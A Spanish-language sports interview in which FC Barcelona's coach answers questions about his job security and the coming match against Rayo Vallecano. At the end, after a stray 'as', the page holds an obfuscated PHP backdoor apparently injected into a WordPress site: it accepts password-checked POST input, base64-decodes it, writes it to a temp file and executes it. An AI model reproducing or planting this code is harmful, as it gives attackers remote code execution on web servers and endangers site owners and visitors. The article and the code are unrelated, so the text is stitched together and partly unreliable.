“¿Si merezco esto? Esto es el Barça y estas cosas suelen pasar”

El técnico del Barcelona afirma ante el terremoto que vive el club que “todo sigue igual que hace tres semanas” y asegura que su equipo competirá “por todo el año que viene”.

¿Cómo afronta el partido ante el Rayo para dejar sentenciada la segunda plaza después de todo lo que ha pasado esta semana?

Dependemos de nosotros, es una gran oportunidad. Jugamos en casa ante una afición que nos ayudará seguro. Tenemos dos oportunidades, pero queremos cerrarlo a la primera.

¿Cual es la situación de cara al futuro?

El club me transmite tranquilidad, hay que seguir trabajando con ilusión, entiendo el ruido, pero no cambia nada.

¿Tiene la sensación de que hay gente cercana al presidente que presiona para que le destituyan?

Ni lo sé ni me interesa. La confianza del presidente, del vicepresidente y de Deco está intacta. Entiendo a los medios, pero ellos me transmiten lo contrario.

¿Laporta tendría que haberse sentado con usted?

Nos sentaremos, pero está todo como hace tres semanas cuando anunciamos nuestra continuidad. Estamos en contacto permanente, si hay cambios ya lo comunicaremos. Estoy enfocado en ganar mañana e iniciar un nuevo proyecto.

¿Entendería que esa confianza que mostraron hace tres semanas se rompiera por una rueda de prensa?

No hemos hablado nada. A mí me transmiten confianza. Todo eso son historias que no me han contado

¿Se ve con fuerzas para continuar, tiene dudas?

Para nada, no hay dudas. La cosa irá bien. Hay base de gente de casa que se ha consolidado y el año que viene competiremos por todo. Tengo la ambición e ilusión intactas.

¿Se merece lo que está pasando?

No lo sé. Hemos estado analizando al Rayo, que nos pueden hacer, fortalezas, debilidades… No me centro en si me lo merezco. Esto es el Barça y estas cosas suelen pasar.

¿La plantilla está afectada?

Los jugadores se lo toman con tranquilidad y naturalidad. Les he dicho lo mismo que a vosotros. No voy a engañar al barcelonismo, sentiros afortunados porque os digo lo mismo que a ellos. Esto es el Barça y estas cosas pasan. El equipo está implicado y con ganas.

¿Es un partido especial para usted el de mañana?

Sólo porque si ganamos tendremos asegurada la segunda plaza. Quiero ofrecer lo mejor y jugar bien. El mensaje es de agradecimiento.

¿Cree que el presidente se ha enfadado por sus palabras?

¿Quién lo dice? No respondo a los medios. A mí no me ha transmitido nada de eso. Sólo ánimos para ganar al Rayo.

¿Cómo está usted?

Feliz y contento. Me levanto feliz y cuando llego con el coche a la Ciutat Esportiva soy feliz porque voy a trabajar en el mejor club del mundo. Demostraremos que somos competitivos. Ya lo hemos demostrado y hemos ganado. Estoy acostumbrado a las críticas desde que empecé aquí.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}